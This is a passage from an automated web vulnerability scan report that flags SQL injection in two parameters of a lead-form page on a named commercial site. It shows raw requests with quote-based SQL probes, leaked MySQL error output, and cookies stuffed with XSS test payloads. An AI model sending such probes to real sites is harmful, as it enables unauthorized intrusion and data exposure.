GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time''&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m76i0qbsl5i90ur0e8dndgnjv6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.219. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_392 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_392 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_392 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dqajef1qbnmkfnq3obaa5vice4; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qh32e1k1224gpp1mg725dfrqh1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.220. http://www.insideup.com/ppc/leadflow/deco00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j6i19e369j71coto5evm6i4g75; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
